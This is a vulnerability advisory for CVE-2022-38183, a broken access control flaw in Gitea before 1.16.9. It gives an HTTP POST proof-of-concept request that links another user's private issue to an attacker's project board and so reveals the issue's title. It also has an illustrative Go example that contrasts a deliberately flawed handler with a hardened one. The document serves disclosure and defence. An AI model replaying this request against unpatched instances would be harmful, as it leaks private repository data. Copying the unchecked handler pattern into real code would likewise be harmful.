usd-2022-0015 | Broken Access Control in Gitea Project Issues

Advisory ID: usd-2022-0015
Product: Gitea
Affected Version: < 1.16.9
Vulnerability Type: CWE-284: Improper Access Control
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: CVE-2022-38183
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2022-38183

Description

Gitea is an open source project that lets users host Git-based version control for software development. Users could add existing issues to project boards. Due to improper access controls, an attacker could assign any issue, including one from a private repository they cannot otherwise access, to a project they control. As a result, the attacker learned the titles of private issues.

Proof of Concept

In the request below, the issue with ID 7 belongs to a private repository of another user.
The project with ID 3 belongs to the attacker.

POST /testuser/test222/issues/projects HTTP/1.1
Host: localhost:3000
Content-Length: 85
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close

_csrf=tvK_ourfR_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue_ids=7&id=3

Once the request is processed, the issue appears on the attacker's project board, exposing its title (the body text is not shown).

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.
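The following Go example, added to this advisory and not taken from Gitea's code base, models the flaw in the proof of concept and one way to close it. The data model (Repo, Issue, Project, Store), the in-memory sample data and the two handler-style functions are all constructed for illustration; the hardened variant assumes the request is scoped to one repository (the `/testuser/test222/` part of the PoC URL) and requires that both the target project and every submitted issue belong to that repository and that the caller may write to it. The actual check Gitea 1.16.9 introduced may differ.

```go
package main

import (
	"errors"
	"fmt"
)

// Hypothetical in-memory model used only for this example; it is not Gitea's schema.
type Repo struct {
	ID      int64
	OwnerID int64
	Private bool // recorded for readability; the checks below key on write access
}

type Issue struct {
	ID     int64
	RepoID int64
	Title  string
}

type Project struct {
	ID     int64
	RepoID int64 // repository the project board belongs to
}

type Store struct {
	Repos    map[int64]*Repo
	Issues   map[int64]*Issue
	Projects map[int64]*Project
}

var (
	ErrNotFound  = errors.New("not found")
	ErrForbidden = errors.New("forbidden")
)

// canWrite: in this toy model only the repository owner may change its project boards.
func (s *Store) canWrite(userID, repoID int64) bool {
	r, ok := s.Repos[repoID]
	return ok && r.OwnerID == userID
}

// AddIssuesUnchecked reproduces the flawed pattern: the caller is allowed to edit the
// target project, but every issue_id from the form is linked without asking which
// repository the issue lives in. The returned titles are what the board would display.
func (s *Store) AddIssuesUnchecked(userID, projectID int64, issueIDs []int64) ([]string, error) {
	p, ok := s.Projects[projectID]
	if !ok {
		return nil, ErrNotFound
	}
	if !s.canWrite(userID, p.RepoID) {
		return nil, ErrForbidden
	}
	var titles []string
	for _, id := range issueIDs {
		is, ok := s.Issues[id]
		if !ok {
			return nil, ErrNotFound
		}
		titles = append(titles, is.Title) // no check on is.RepoID: leaks foreign issues
	}
	return titles, nil
}

// AddIssuesChecked is the hardened form: repoID is the repository the request is scoped
// to; the caller must be able to write to it, and the project and every issue must belong
// to it. Foreign objects are reported as not found rather than confirming their existence.
func (s *Store) AddIssuesChecked(userID, repoID, projectID int64, issueIDs []int64) ([]string, error) {
	if !s.canWrite(userID, repoID) {
		return nil, ErrForbidden
	}
	p, ok := s.Projects[projectID]
	if !ok || p.RepoID != repoID {
		return nil, ErrNotFound
	}
	var titles []string
	for _, id := range issueIDs {
		is, ok := s.Issues[id]
		if !ok || is.RepoID != repoID {
			return nil, ErrNotFound
		}
		titles = append(titles, is.Title)
	}
	return titles, nil
}

// sampleStore builds constructed data mirroring the PoC: issue 7 lives in a private repo
// owned by user 2, while project 3 belongs to the public repo of user 1 (the attacker).
func sampleStore() *Store {
	return &Store{
		Repos: map[int64]*Repo{
			1: {ID: 1, OwnerID: 1, Private: false},
			2: {ID: 2, OwnerID: 2, Private: true},
		},
		Issues: map[int64]*Issue{
			5: {ID: 5, RepoID: 1, Title: "public bug"},
			7: {ID: 7, RepoID: 2, Title: "secret roadmap"},
		},
		Projects: map[int64]*Project{
			3: {ID: 3, RepoID: 1},
		},
	}
}

func main() {
	s := sampleStore()
	titles, err := s.AddIssuesUnchecked(1, 3, []int64{7})
	fmt.Println("unchecked:", titles, err) // the private title is exposed
	titles, err = s.AddIssuesChecked(1, 1, 3, []int64{7})
	fmt.Println("checked, foreign issue:", titles, err) // not found
	titles, err = s.AddIssuesChecked(1, 1, 3, []int64{5})
	fmt.Println("checked, own issue:", titles, err) // accepted
}
```

The key design point is that the authorization decision is made against the repository the request is scoped to, not against the project ID or issue IDs the client supplies; any object that does not belong to that repository is treated exactly like a nonexistent one, so the response neither links it nor reveals whether it exists.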

References

Timeline

  • 2022-06-22: This vulnerability is identified by Christian Pöschl.
  • 2022-06-22: First attempt to contact the vendor.
  • 2022-07-01: The vendor begins investigating the vulnerability.
  • 2022-07-12: Gitea 1.16.9 is released; the release notes include an acknowledgement: https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/.
  • 2022-07-15: The vulnerability is confirmed to be fixed by the vendor.
  • 2024-05-29: This advisory is published.

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.